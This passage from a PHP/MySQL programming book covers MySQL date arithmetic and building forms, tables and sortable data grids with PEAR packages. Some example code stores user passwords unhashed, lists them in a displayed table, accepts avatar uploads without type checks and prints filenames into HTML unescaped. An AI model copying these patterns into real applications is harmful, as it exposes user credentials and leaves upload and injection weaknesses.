    %r               time, 12-hour (hh:mm:ss followed by AM or PM)
    %S or %s         seconds (00 … 59)
    %T               time, 24-hour (hh:mm:ss)
    %W               weekday name (Sunday … Saturday)
    %w               day of the week (0=Sunday … 6=Saturday)
    %Y               year, numeric, four digits
    %y               year, numeric (two digits)
    %%               a literal % character

Much like the PHP date function, the DATE_FORMAT function uses a format string containing specifiers to define the formatting. A list of commonly used specifiers can be seen in Table 4.2.
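If the formatting needs to happen in PHP rather than in the query, a similar result can be had from a DATETIME string. This is only a sketch: it relies on DateTime::createFromFormat (PHP 5.3 and later), the variable names are illustrative, and the party date is the example value used earlier in this section.

```php
<?php
$fromDatabase = '2008-02-14 13:00:00'; // a value as MySQL would return it

$moment = DateTime::createFromFormat('Y-m-d H:i:s', $fromDatabase);
if ($moment === false) {
    // createFromFormat returns false when the string doesn't match the format
    throw new InvalidArgumentException('Unexpected date format');
}

// The backslashes keep "a" and "t" from being read as placeholders
$friendly = $moment->format('F jS, Y \a\t g a');
echo $friendly . PHP_EOL; // February 14th, 2008 at 1 pm
```

Formatting in the query keeps the PHP code shorter, while formatting in PHP leaves the raw value available for further calculations; which is preferable depends on the application.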
  • 135. How do I perform date calculations using MySQL?

    When performing queries, it’s not uncommon to find the need for date range specification. You may, for example, need to retrieve all blog posts created within the last 30 days. Date calculations are a breeze in MySQL; let’s have a look at them.

    Solution

    You can perform complex date math using the MySQL date functions. We can add and subtract time intervals that are identified using the INTERVAL keyword via the DATE_ADD and DATE_SUB functions. Thus, we use DATE_ADD to add one day:

        mysql> SELECT DATE_ADD(NOW(), INTERVAL 1 DAY);
        +---------------------------------+
        | DATE_ADD(NOW(), INTERVAL 1 DAY) |
        +---------------------------------+
        | 2007-10-09 21:32:20             |
        +---------------------------------+

    Likewise, we use DATE_SUB to subtract one day:

        mysql> SELECT DATE_SUB(NOW(), INTERVAL 1 DAY);
        +---------------------------------+
        | DATE_SUB(NOW(), INTERVAL 1 DAY) |
        +---------------------------------+
        | 2007-10-07 21:32:26             |
        +---------------------------------+

    We can also add or subtract months and years:

        mysql> SELECT DATE_ADD(NOW(), INTERVAL 1 MONTH);
        +-----------------------------------+
        | DATE_ADD(NOW(), INTERVAL 1 MONTH) |
        +-----------------------------------+
        | 2007-11-08 21:31:05               |
        +-----------------------------------+

        mysql> SELECT DATE_SUB(NOW(), INTERVAL 1 MONTH);
        +-----------------------------------+
        | DATE_SUB(NOW(), INTERVAL 1 MONTH) |
  • 136.
        +-----------------------------------+
        | 2007-09-08 21:31:55               |
        +-----------------------------------+

        mysql> SELECT DATE_ADD(NOW(), INTERVAL 1 YEAR);
        +----------------------------------+
        | DATE_ADD(NOW(), INTERVAL 1 YEAR) |
        +----------------------------------+
        | 2008-10-08 21:32:31              |
        +----------------------------------+

        mysql> SELECT DATE_SUB(NOW(), INTERVAL 1 YEAR);
        +----------------------------------+
        | DATE_SUB(NOW(), INTERVAL 1 YEAR) |
        +----------------------------------+
        | 2006-10-08 21:32:37              |
        +----------------------------------+

    We can use more human-friendly terms when writing SQL queries in MySQL (such as 1 DAY, 1 MONTH, and 1 YEAR) than when we deal with Unix timestamps, which are measured in seconds. Note that the interval unit is always singular: INTERVAL 30 DAY, not INTERVAL 30 DAYS.

    With MySQL, we can use the DATE_SUB and DATE_ADD functions to retrieve database records within a certain date range. Here, we get all the data with an updated_date within the last 30 days:

        SELECT * FROM my_table
        WHERE updated_date >= DATE_SUB(NOW(), INTERVAL 30 DAY);

    Similarly, the following will yield the rows with an updated_date that’s at least one week old, but no more than 14 days old:

        SELECT * FROM my_table
        WHERE updated_date BETWEEN DATE_SUB(NOW(), INTERVAL 14 DAY)
                               AND DATE_SUB(NOW(), INTERVAL 7 DAY);

    As you can see, MySQL date functions make it incredibly easy to calculate dates, thanks to the use of human-friendly terms.

    Summary

    In this chapter, we’ve investigated the use of Unix timestamps and the flexibility of the PHP strtotime and date functions, so that we can complete almost any job
  • 137. involving dates and times without raising a sweat. We’ve also seen that, by combining DATE_SUB or DATE_ADD with the INTERVAL keyword, MySQL’s date functions offer capabilities similar to those available in PHP.

    You may be wondering which approach you should take in making your own date calculations: should you use the PHP functions or try the MySQL functions? The decision is an easy one: when the timestamps are stored in a database, it’s quicker to use the MySQL method. However, as we saw in the calendar example in this chapter, when the timestamps don’t originate in the database, it’s quicker to use the PHP approach.

    None of us can escape the relentless march of time, but when we harness the power of the PHP date functions we can, at least, master time calculations and presentation. Functions like strtotime and date may seem simplistic at first glance, but can be used with great sophistication in your web applications.
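When the timestamps do not come from the database, the interval arithmetic shown with DATE_ADD and DATE_SUB can be approximated in PHP. The sketch below is one possible approach using DateTimeImmutable::modify, which accepts the same relative formats as strtotime; the fixed reference time is an assumption made so that the results are reproducible.

```php
<?php
// Fixed reference time for reproducibility; a real script would
// typically start from the current time instead.
$now = new DateTimeImmutable('2007-10-08 21:32:20');

// Counterparts of DATE_ADD(..., INTERVAL 1 DAY) and
// DATE_SUB(..., INTERVAL 1 MONTH).
$tomorrow  = $now->modify('+1 day');
$lastMonth = $now->modify('-1 month');

// Bounds for "between 7 and 14 days old".
$rangeStart = $now->modify('-14 days');
$rangeEnd   = $now->modify('-7 days');

$fmt = 'Y-m-d H:i:s'; // same layout as a MySQL DATETIME value

echo $tomorrow->format($fmt), PHP_EOL;  // 2007-10-09 21:32:20
echo $lastMonth->format($fmt), PHP_EOL; // 2007-09-08 21:32:20
echo $rangeStart->format($fmt), ' to ', $rangeEnd->format($fmt), PHP_EOL;
```

Strings produced this way could also be bound as parameters in a prepared statement, although for data that already lives in MySQL the chapter's advice to let the database do the arithmetic still applies.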
  • 139. Chapter 5: Forms, Tables, and Pretty URLs

    Creating interactive web pages is what PHP is all about. As you use PHP to build web sites and applications, you’ll quickly notice that you’re called upon to develop the same web page elements over and over. When you’re working on your first PHP web site, writing a script to generate an HTML table may not seem like a huge problem, but give it time: after you’ve put together a few sites and have had to go back to modify your past efforts again and again, working on tables won’t seem so rosy. Eventually, the mere mention of the word “maintenance” may well have you gasping “Not another table!” as you weep quietly into your keyboard.

    Fear not: help is at hand! Not all HTML is the same, yet there are obvious commonalities between HTML elements. These commonalities make the perfect targets for PHP’s classes, which allow you to eliminate repetitive work and concentrate on the creative aspects of programming that you enjoy.

    In this chapter, we’ll provide solutions for some of the most common tasks: building forms, building tables, and creating pretty URLs. In the process, we’ll make extensive
  • 140. use of some of PEAR’s HTML packages; as a step up from hand coding your own HTML forms and tables, PEAR represents excellent value.

    Some of the examples we’ll discuss here will use the following database tables. First up, a table for users:

    chapter_05.sql (excerpt)

        CREATE TABLE user (
          id INT(11) NOT NULL AUTO_INCREMENT,
          login VARCHAR(50) NOT NULL DEFAULT '',
          password VARCHAR(50) NOT NULL DEFAULT '',
          email VARCHAR(50) DEFAULT NULL,
          first_name VARCHAR(50) DEFAULT NULL,
          last_name VARCHAR(50) DEFAULT NULL,
          signature TEXT NOT NULL,
          PRIMARY KEY (id),
          UNIQUE KEY user_login (login)
        );

    We’ll also use this table to store images:

    chapter_05.sql (excerpt)

        CREATE TABLE user_images (
          image_id INT(11) NOT NULL AUTO_INCREMENT,
          user_id INT(11) NOT NULL,
          type VARCHAR(50) NOT NULL DEFAULT '',
          filename VARCHAR(32) NOT NULL,
          PRIMARY KEY (image_id)
        );

    How do I build HTML forms with PHP?

    HTML forms are the key input mechanism for user data on a web site. As web developers, we must handle several facets of HTML forms:

    ■ form generation
    ■ form validation
    ■ retrieving valid form data
    ■ repopulating invalid forms with submitted data
  • 141. Solution

    Thankfully, PEAR comes to the rescue with HTML_QuickForm [1], which aims to do exactly as its name states: make forms quickly. HTML_QuickForm can help to automate all the tasks associated with form building.

    Using HTML_QuickForm2

    At the time of writing, PEAR had released an alpha version of the HTML_QuickForm2 class [2]. This new version is written specifically for PHP 5 and is compatible with the E_STRICT level of error reporting.

    Our first example demonstrates how easy it is to build a registration form using the HTML_QuickForm class. We begin our form by including the HTML/QuickForm.php file and instantiating our HTML_QuickForm object:

    htmlForm.php (excerpt)

        <?php
        require_once 'HTML/QuickForm.php';
        $form = new HTML_QuickForm('Create', 'post', basename(__FILE__));

    The arguments supplied to the constructor represent the form’s name, method, and action HTML attributes. Next, we start to add the required form elements using the addElement method:

    htmlForm.php (excerpt)

        $opts = array('size' => 20, 'maxlength' => 255);
        $form->addElement('static', 'header', null, '<h1>Register</h1>');
        $form->addElement('text', 'first_name', 'First Name', $opts);
        $form->addElement('text', 'last_name', 'Last Name', $opts);
        $form->addElement('text', 'login', 'Login Name', $opts);
        $form->addElement('password', 'password', 'Password', $opts);
        $form->addElement('text', 'email', 'E-Mail', $opts);

    [1] http://pear.php.net/package/HTML_QuickForm/
    [2] http://pear.php.net/package/HTML_QuickForm2/
  • 142.
        // Named 'validemail' so that it matches the removeElement('validemail')
        // call made before the form is frozen.
        $form->addElement('static', 'validemail', null,
            '<strong>E-Mail address must be valid, and will only be' .
            ' used for account verification.</strong>');
        $form->addElement('textarea', 'signature', 'Signature',
            array('rows' => 10, 'cols' => 20));
        $form->addElement('file', 'avatar', 'Avatar Image');
        $form->addElement('static', 'reqs', null,
            '<strong>Image <em>must</em> be no more than 64x64 pixels' .
            ' in size.</strong>');
        $form->addElement('submit', 'register', "Register Now!");

    The first argument passed to the addElement method represents the element type. Many element types are possible, and each is represented by a PHP class; the full list is available on the “QuickForm element types” PEAR documentation page [3]. The element types we’ve used above include static, which represents static HTML content that’s not submitted with the form. We’ve used static elements for the heading and form help text. The other types we’ve used include text, password, textarea, file, and submit; each represents its respective HTML form element equivalent.

    The remaining arguments, which we’ve passed to the addElement method, are subsequently passed to the constructor methods of the appropriate type classes and, as such, are specific to those classes. The “QuickForm element types” PEAR documentation page has all the details you’ll need to use these classes [4].

    After we’ve added the form elements, we can obtain the form HTML source using the toHtml method:

    htmlForm.php (excerpt)

        $formsource = $form->toHtml();
        ?>

    The only thing that’s left to do is add the form source to a web page:

    [3] http://pear.php.net/manual/en/package.html.html-quickform.intro-elements.php
    [4] http://pear.php.net/manual/en/package.html.html-quickform.intro-elements.php
  • 143. htmlForm.php (excerpt)

        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
          "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
        <html xmlns="http://www.w3.org/1999/xhtml">
          <head>
            ⋮ HTML head contents…
          </head>
          <body>
            <?php echo $formsource; ?>
          </body>
        </html>

    The code above will render as shown in Figure 5.1.

    Figure 5.1. Our first registration form
  • 144. As you can see, this form really doesn’t do much, and apart from the fact that it was slightly easier to build this form than to hand-code the HTML, you might be forgiven for asking, “What’s all the fuss about?” Well, as you’ll see in the next example, we can add complex validation rules to the form with a minimum of fuss and bother.

    We use the addRule method to add validation rules to the form [5]:

    htmlFormValidation.php (excerpt)

        $form->addRule('first_name', 'You must enter your first name',
            'required', null, 'client');
        $form->addRule('first_name',
            'Your first name must be at least 3 letters',
            'minlength', '3', 'client');

    The first argument to the addRule method is the form element name, which is followed by the error message. The third argument indicates the type of validation required. It is followed by an optional argument that carries any extra data the validation type needs, and by an optional indication of where the validation should occur; this setting can specify client or server. If it specifies client, JavaScript validation is added to the form to support the rule.

    You may have noticed in the code above that you can add multiple rules for a single form element. We can see that the first rule in the code above is a required rule, which indicates that the field cannot be blank. As no arguments are required for this rule, the next argument is null. The final argument indicates the validation is to occur on the client, that is, the browser. The second rule is a minlength rule and the optional argument indicates that the first_name field value has a minimum length of 3 characters.

    We’re not limited to only those rules, however. Many other validation types are available, and they’re all handily documented on the PEAR web site [6]. Let’s go ahead and add more rules for the remaining elements:

    [5] http://pear.php.net/manual/en/package.html.html-quickform.html-quickform.addrule.php
    [6] http://pear.php.net/manual/en/package.html.html-quickform.intro-validation.php
  • 145. htmlFormValidation.php (excerpt)

        $form->addRule('last_name', 'You must enter your last name',
            'required', null, 'client');
        $form->addRule('last_name',
            'Your last name must be at least 3 letters',
            'minlength', '3', 'client');
        $form->addRule('email', 'You must enter your email address',
            'required', null, 'client');
        $form->addRule('email', 'Please enter a valid email address',
            'email', FALSE, 'client');
        $form->addRule('login', 'You must enter a login name',
            'required', null, 'client');
        $form->addRule('login',
            'Your login name must be between 6-20 characters long',
            'rangelength', array(6, 20), 'client');
        $form->addRule('password', 'You must enter a password',
            'required', null, 'client');
        $form->addRule('password',
            'Your Password must be at least 6 characters long.',
            'minlength', '6', 'client');

    Now that we’ve added these rules, we can add some form handling code:
  • 146. htmlFormValidation.php (excerpt)

        if ($form->validate())
        {
          $form->removeElement('validemail');
          $form->removeElement('reqs');
          $form->removeElement('avatar');
          $form->removeElement('register');
          $form->freeze();
          $formsource = $form->toHtml();
        }
        else
        {
          $formsource = $form->toHtml();
        }
        ?>

    The validate method allows us to check whether the form has been submitted and has passed all the validation requirements. If the form validates, you can add code at this step to manipulate the form data in some way, for example, to save it to a database.

    For the purposes of our example solution, we freeze the form and display it again. Elements that are frozen only display their values, not the editable form element. Of course, this makes no difference to static elements and buttons, so we remove those elements from the form before we freeze it. Using the freeze method to freeze the form allows us to add a confirmation step to the form submission process, which gives users a chance to review their information before they submit it.

    If the form has not passed validation, we simply display its HTML source. This step is also taken if the form has not yet been submitted. If validation errors have been detected, the validation rule error messages will be added to the form’s HTML source.

    You can see the rendered form in Figure 5.2. Notice how the presence of the validation rules has automatically inserted required field indicators. That image also shows the error message that was added by the server-side validation mechanism; you’ll have to disable JavaScript in your browser to see this message yourself. Figure 5.3 shows the frozen form.
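To make the rule types more concrete, here is a rough plain-PHP sketch of what server-side checks in the spirit of the required, minlength, rangelength, and email rules might look like. It does not show how HTML_QuickForm implements its rules; validateRegistration is a hypothetical helper introduced purely for illustration, and only three of the fields are covered.

```php
<?php
/**
 * Hypothetical helper (not part of PEAR): applies checks similar in
 * spirit to the 'required', 'minlength', 'rangelength' and 'email' rules.
 *
 * @param array $input submitted values keyed by field name
 * @return array error messages keyed by field name (empty when valid)
 */
function validateRegistration(array $input): array
{
    $errors = [];

    // Fetch a field as a trimmed string, treating a missing key as empty.
    $value = function (string $field) use ($input): string {
        return trim((string) ($input[$field] ?? ''));
    };

    // required + minlength(3)
    if ($value('first_name') === '') {
        $errors['first_name'] = 'You must enter your first name';
    } elseif (strlen($value('first_name')) < 3) {
        $errors['first_name'] = 'Your first name must be at least 3 letters';
    }

    // required + rangelength(6, 20)
    $loginLength = strlen($value('login'));
    if ($loginLength === 0) {
        $errors['login'] = 'You must enter a login name';
    } elseif ($loginLength < 6 || $loginLength > 20) {
        $errors['login'] = 'Your login name must be between 6-20 characters long';
    }

    // required + email
    if ($value('email') === '') {
        $errors['email'] = 'You must enter your email address';
    } elseif (filter_var($value('email'), FILTER_VALIDATE_EMAIL) === false) {
        $errors['email'] = 'Please enter a valid email address';
    }

    return $errors;
}

print_r(validateRegistration([
    'first_name' => 'Al',
    'login'      => 'alice123',
    'email'      => 'alice@example.org',
]));
```

Writing such checks by hand for every form is exactly the repetition that the addRule calls remove, and the hand-written version still lacks the client-side JavaScript counterpart that the 'client' setting generates.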
  • 147. Figure 5.2. The registration form with validation mechanisms
  • 148. Figure 5.3. The frozen registration form

    Now that we’ve validated the data submitted by our users, we need to accept and store it. Let’s look at an alternative to the above example, in which we extract the form data and insert it into our database.

    To extract the submitted data from the form, we simply use the exportValues method:

    htmlFormExport.php (excerpt)

        if ($form->validate())
        {
          $values = $form->exportValues();

    Now that we have our form data, we can make a database connection and insert it into the database:

    htmlFormExport.php (excerpt)

          require 'dbcred.php';
          try
          {
            $db = new PDO($dsn, $user, $password);
            $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
            $sql = 'INSERT INTO user ' .
                '(login, password, email, first_name, last_name,' .
  • 149.
                ' signature) VALUES (:login, :password, :email,' .
                ' :firstname, :lastname, :sig)';
            $stmt = $db->prepare($sql);
            $stmt->bindParam(':login', $values['login']);
            $stmt->bindParam(':password', $values['password']);
            $stmt->bindParam(':email', $values['email']);
            $stmt->bindParam(':firstname', $values['first_name']);
            $stmt->bindParam(':lastname', $values['last_name']);
            $stmt->bindParam(':sig', $values['signature']);
            $stmt->execute();

    First, we insert the registration information into the user table. Using PDO and the prepare and execute methods with bound parameters allows us to safely use the form data in our SQL query. For more information about this technique, have a look at “How do I add data to, or modify data in, my database?” in Chapter 2.

    Next, we obtain the insert ID from the previous database insert operation; we’ll need this in a moment. The $form->_submitFiles property contains an array of files that were submitted with the form. We can use this information to gain access to the avatar image file, and move it to the avatar directory, applying a unique filename to it at the same time:

    htmlFormExport.php (excerpt)

            $id = $db->lastInsertId();
            $type = $form->_submitFiles['avatar']['type'];
            $file = 'images/avatars/' . md5(microtime()) .
                basename($form->_submitFiles['avatar']['name']);
            move_uploaded_file(
                $form->_submitFiles['avatar']['tmp_name'], $file);

    We also need to insert this image file information into the user_images table. This is a great opportunity to use that insert ID we saved in the previous operation:
  • 150. htmlFormExport.php (excerpt)

            $sql = 'INSERT INTO user_images' .
                ' (user_id, type, filename) VALUES' .
                ' (:id, :type, :file)';
            $stmt = $db->prepare($sql);
            $stmt->bindParam(':id', $id);
            $stmt->bindParam(':type', $type);
            $stmt->bindParam(':file', $file);
            $stmt->execute();

    Our final task is to create the confirmation display:

    htmlFormExport.php (excerpt)

            $form->removeElement('validemail');
            $form->removeElement('reqs');
            $form->removeElement('avatar');
            $form->removeElement('register');
            $form->freeze();
            $formsource = $form->toHtml() .
                '<p>The above information has been successfully submitted</p>';
          }

    If, however, a database exception occurred, we’ll need to log the error and create the error message display:

    htmlFormExport.php (excerpt)

          catch (PDOException $e)
          {
            error_log('Registration form error: ' . $e->getMessage());
            $form->removeElement('validemail');
            $form->removeElement('reqs');
            $form->removeElement('avatar');
            $form->removeElement('register');
            $form->freeze();
            $formsource = $form->toHtml() .
                '<p>An error has occurred. The above information was' .
                ' not successfully submitted</p>';
          }
        }
  • 151. Finally, as usual, if the form hasn’t been submitted, we just display it:

    htmlFormExport.php (excerpt)

        else
        {
          $formsource = $form->toHtml();
        }

    Using the HTML_QuickForm class allows you to quickly and efficiently add web page forms to your web site or web application with a minimum of fuss. Make sure you check out the PEAR documentation to discover all the other functionality available in the class [7].

    How do I display data in a table?

    Tables are an integral part of data display, which (let’s face it) is an integral part of most web pages! So how do you easily display your data in a table, in a way that automates most of the boring, repetitive pieces of table HTML you have to write?

    Solution

    The answer to this question is to use PEAR’s HTML_Table class [8]. In this example, we’ll use HTML_Table to display the results of a simple SQL query.

    First, we need to include the required PHP files:

    pearTable.php (excerpt)

        <?php
        require 'dbcred.php';
        require 'HTML/Table.php';

    dbcred.php contains our database login credentials for use with PDO. The file contains credentials relevant to our testing environment, so you’ll need to change them should you wish to try this on your own web server. HTML/Table.php contains the HTML_Table class.

    [7] http://pear.php.net/package/HTML_QuickForm/
    [8] http://pear.php.net/manual/en/package.html.html-table.php
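The contents of dbcred.php are not reproduced in this chapter. As a rough guide only, a file of this kind might look like the sketch below. The variable names are the ones the chapter's scripts refer to ($dsn, $user, $password, and later $db_host and $db_name), but every value is a placeholder assumption and must be replaced with your own settings.

```php
<?php
// dbcred.php: hypothetical contents; all values are placeholders.
$db_host  = 'localhost';
$db_name  = 'anthology';
$user     = 'php_user';
$password = 'change-me';

// Data source name in the form expected by PDO's MySQL driver.
$dsn = "mysql:host=$db_host;dbname=$db_name";
```

Keeping credentials in one included file means that a change of server or password only has to be made in a single place.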
  • 152. Next, we instantiate our PDO object and perform the SQL query. We open a try block to catch any PDOExceptions that may occur:

    pearTable.php (excerpt)

        try
        {
          $db = new PDO($dsn, $user, $password);
          $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
          $sql = "SELECT * FROM user";
          $stmt = $db->prepare($sql);
          $stmt->execute();

    The creation of the table is simple. We instantiate the HTML_Table object and call the setAutoGrow method, which activates a flag instructing HTML_Table to automatically add rows and columns when data is added into a non-existent cell. We then call the addRow method to add a header row:

    pearTable.php (excerpt)

          $table = new HTML_Table;
          $table->setAutoGrow(true);
          $table->addRow(array("", "Login", "Password", "E-Mail",
              "First Name", "Last Name", "Signature"), null, "th");

    That row addition is followed by a while loop in which we call the addRow method to add the query results. The addRow method accepts an indexed array as an argument for the row content, so we need to call PDOStatement->fetch with the PDO::FETCH_NUM argument to make PDO return our row data as an indexed array. Finally, we call toHTML to assign the table HTML source to a variable:

    pearTable.php (excerpt)

          while ($row = $stmt->fetch(PDO::FETCH_NUM))
          {
            $table->addRow($row);
          }
  • 153.
          $tablesource = $table->toHTML();
        }

    Our catch block simply logs any errors and sets the $tablesource variable to an empty string, thus avoiding outputting any cryptic error messages to our web page users:

    pearTable.php (excerpt)

        catch (PDOException $e)
        {
          error_log('Error in ' . $e->getFile() .
              ' Line: ' . $e->getLine() .
              ' Error: ' . $e->getMessage());
          $tablesource = "";
        }
        ?>

    The $tablesource variable can now be used in the web page output:

    pearTable.php (excerpt)

        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
          "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
        <html xmlns="http://www.w3.org/1999/xhtml">
          <head>
            ⋮ HTML head contents…
          </head>
          <body>
            <h1>PEAR::HTML_Table</h1>
            <?php echo $tablesource ?>
          </body>
        </html>

    And we’re done! HTML_Table is a great time saver for outputting tabular data.
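To appreciate what HTML_Table takes off your hands, it may help to see a hand-rolled equivalent. The sketch below is not how HTML_Table works internally; renderTable is a hypothetical helper, and the escaping with htmlspecialchars is an addition of this sketch rather than something the solution above performs.

```php
<?php
/**
 * Hypothetical helper: renders a header row plus data rows as an HTML
 * table, escaping every cell value.
 *
 * @param array $headers column labels
 * @param array $rows    list of indexed arrays, one per table row
 */
function renderTable(array $headers, array $rows): string
{
    // Wrap a value in the given cell tag, escaping HTML special characters.
    $cell = function (string $tag, $value): string {
        $safe = htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
        return "<$tag>$safe</$tag>";
    };

    $html = "<table>\n  <tr>";
    foreach ($headers as $header) {
        $html .= $cell('th', $header);
    }
    $html .= "</tr>\n";

    foreach ($rows as $row) {
        $html .= '  <tr>';
        foreach ($row as $value) {
            $html .= $cell('td', $value);
        }
        $html .= "</tr>\n";
    }

    return $html . "</table>\n";
}

echo renderTable(
    ['Login', 'E-Mail'],
    [['jbloggs', 'joe@example.org'], ['jdoe', 'jane@example.org']]
);
```

Even this small version has to manage row and cell tags by hand, and it offers none of the cell attributes or auto-grow behavior described above.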
  • 154. How do I display data in a sortable table?

    Usually there’s more to displaying tabular data than just putting it in a table. If you have large data sets, you might like to add user interface controls like column sorting or paging to your tables, so that your users can easily digest the content in small chunks.

    Solution

    The PEAR Structures_DataGrid class is more than capable of handling the job [9]. Structures_DataGrid has more features than I can list here; we’ll only be using a few of them in our solution, which builds an HTML table with column sorting and paging controls. This solution also requires several PEAR packages to function properly. They are: Structures_DataGrid_DataSource_MDB2 [10], MDB2_Driver_mysql [11], Structures_DataGrid_Renderer_HTMLTable [12], and Structures_DataGrid_Renderer_Pager [13].

    Once we’ve made sure all those PEAR packages are installed, we can get started on the solution. First, we need to include the required PHP files:

    pearDataGrid.php (excerpt)

        <?php
        require 'dbcred.php';
        require 'Structures/DataGrid.php';

    dbcred.php contains our database login credentials, which we’ll use with our Structures_DataGrid object. The file contains credentials relevant to our testing environment, so you’ll need to change them to suit should you wish to try this on your own web server. Structures/DataGrid.php is required to create our Structures_DataGrid object.

    The next step is to instantiate our Structures_DataGrid object and bind it to the SQL query:

    [9] http://pear.php.net/package/Structures_DataGrid/
    [10] http://pear.php.net/package/Structures_DataGrid_DataSource_MDB2/
    [11] http://pear.php.net/package/MDB2_Driver_mysql/
    [12] http://pear.php.net/package/Structures_DataGrid_Renderer_HTMLTable/
    [13] http://pear.php.net/package/Structures_DataGrid_Renderer_Pager/
  • 155. pearDataGrid.php (excerpt)

        $datagrid = new Structures_DataGrid(2);
        $options = array(
            'dsn' => "mysql://$user:$password@$db_host/$db_name");
        $sql = "SELECT * FROM user";
        $bind = $datagrid->bind($sql, $options);
        if (PEAR::isError($bind))
        {
          error_log('DataGrid Error: ' . $bind->getMessage());
          $gridsource = '';
        }

    We instantiate the grid, specifying that each page should display two rows. We then bind the grid to the SQL query using the bind method. We pass database information in the $options array to enable our Structures_DataGrid object to automatically choose the correct database driver to use, and make a connection.

    We check for errors that may have been generated from the bind method call using the PEAR::isError method, and if we detect an error, we make sure to log it and set our $gridsource variable to an empty string. This will ensure that the displayed web page will not contain any cryptic error messages.

    If no errors are reported, we can proceed to build our grid. We start by defining the columns and setting rendering options for the grid:

    pearDataGrid.php (excerpt)

        else
        {
          $columns = array(
              'first_name' => 'First Name',
              'last_name' => 'Last Name',
              'email' => 'E-Mail',
              'login' => 'Login Name',
              'signature' => 'Signature',
          );
          $datagrid->generateColumns($columns);
          $renderer_options = array(
              'sortIconASC' => '&uArr;',
              'sortIconDESC' => '&dArr;',
  • 156.
              'headerAttributes' => array('bgcolor' => '#E3E3E3'),
              'evenRowAttributes' => array('bgcolor' => '#A6A6A6'),
          );
          $datagrid->setRendererOptions($renderer_options);
          $renderer = $datagrid->getRenderer();
          $renderer->setTableAttribute('cellspacing', 0);
          $renderer->setTableAttribute('cellpadding', 5);
          $renderer->setTableAttribute('border', 1);

    To generate the columns of our grid, we call the convenient generateColumns method. All we have to do is supply an array that maps our SQL field names to column labels, and Structures_DataGrid will do the rest.

    Next, we retrieve the HTML source of our grid and pager using the getOutput method, and store it in the $gridsource variable:

    pearDataGrid.php (excerpt)

          $gridbody = $datagrid->getOutput();
          if (PEAR::isError($gridbody))
          {
            error_log('DataGrid render error: ' .
                $gridbody->getMessage());
            $gridbody = '';
          }
          $gridpager = $datagrid->getOutput(DATAGRID_RENDER_PAGER);
          if (PEAR::isError($gridpager))
          {
            error_log('DataGrid render error: ' .
                $gridpager->getMessage());
            $gridpager = '';
          }
          $gridsource = $gridbody . $gridpager;
        }
        ?>

    When we call the getOutput method, we make sure to test the return value for errors and take appropriate action. Finally, our grid can be output to a web page:
  • 157. pearDataGrid.php (excerpt)

        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
          "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
        <html xmlns="http://www.w3.org/1999/xhtml">
          <head>
            ⋮ HTML head contents…
          </head>
          <body>
            <h1>PEAR::Structures_DataGrid</h1>
            <?php echo $gridsource ?>
          </body>
        </html>

    With these scant few lines of code, we can generate a dynamic table that will automatically allow users to order the data by clicking on each column’s header, and will automatically implement dynamic paging. The resulting output can be seen in Figure 5.4.

    Figure 5.4. Structures_DataGrid in action

    As we can see, Structures_DataGrid handles a huge amount of the work necessary to generate a very feature-rich table, including modifying the SQL query to incorporate ordering and paging, and making sure that the icon to denote ordering direction is shown correctly.
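The query rewriting mentioned above can be pictured with a small sketch. This is not Structures_DataGrid's actual implementation, which the chapter does not show; pagedQuery is a hypothetical helper that simply appends ORDER BY and LIMIT clauses, checking the column name against a whitelist because identifiers cannot be bound as prepared-statement parameters.

```php
<?php
/**
 * Hypothetical helper: appends ordering and paging clauses to a query.
 *
 * @param string $baseSql   query without ORDER BY or LIMIT
 * @param array  $sortable  column names the user may sort by
 * @param string $orderBy   requested sort column
 * @param string $direction 'ASC' or 'DESC' (case-insensitive)
 * @param int    $page      1-based page number
 * @param int    $perPage   rows per page
 */
function pagedQuery(
    string $baseSql,
    array $sortable,
    string $orderBy,
    string $direction,
    int $page,
    int $perPage
): string {
    // Fall back to the first allowed column for unknown input.
    if (!in_array($orderBy, $sortable, true)) {
        $orderBy = $sortable[0];
    }
    $direction = strtoupper($direction) === 'DESC' ? 'DESC' : 'ASC';
    $page      = max(1, $page);
    $perPage   = max(1, $perPage);
    $offset    = ($page - 1) * $perPage;

    return sprintf(
        '%s ORDER BY %s %s LIMIT %d OFFSET %d',
        $baseSql,
        $orderBy,
        $direction,
        $perPage,
        $offset
    );
}

echo pagedQuery(
    'SELECT * FROM user',
    ['first_name', 'last_name', 'email'],
    'last_name',
    'desc',
    2,
    2
), PHP_EOL;
// SELECT * FROM user ORDER BY last_name DESC LIMIT 2 OFFSET 2
```

With two rows per page, as in the grid above, page 2 starts at offset 2. The grid class additionally reads the requested column and page from the request and renders the matching links and sort icons.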
  • 158. How do I create a customized data grid?

    Showing tabular data in a table seems fairly straightforward, but when the tables are part of a web application, customization is often required. For example, you might want to display a list of member information in a tabular format, customizing one column to display members’ avatar thumbnails.

    Solution

    The Structures_DataGrid class allows you to specify formatter function callbacks to customize the data shown in a table. In this solution, we’ll add customized columns for the members’ names and avatars. Check “How do I display data in a sortable table?” in this chapter to make sure you have everything on the list of required PEAR packages.

    The first step is to include the required PHP files:

    pearDataGridCustom.php (excerpt)

        <?php
        require 'dbcred.php';
        require 'Structures/DataGrid.php';

    dbcred.php contains the database login credentials for use with our Structures_DataGrid object. The file contains credentials relevant to our testing environment, so be sure to change them should you wish to try this on your own web server. Structures/DataGrid.php is required to create our Structures_DataGrid object.

    Next, we define some custom callback functions, getName and getThumbnail:

    pearDataGridCustom.php (excerpt)

        function getName($data)
        {
          return $data['record']['first_name'] . ' ' .
              $data['record']['last_name'];
        }
        function getThumbnail($data)
  • 159.
        {
          if (strlen($data['record']['filename']) > 0)
          {
            return '<img src="images/avatars/' .
                $data['record']['filename'] . '" />';
          }
          else
          {
            return '<img src="images/avatars/missing.gif" />';
          }
        }

    The first function, getName, simply concatenates the first_name and last_name columns. getThumbnail returns an HTML <img> tag using the filename column. When a callback function is called, it’s passed, as its argument, an array that contains the database row as well as some information about the column in question: the current ordering and the row number. Callback functions must return the string to be displayed in the column.

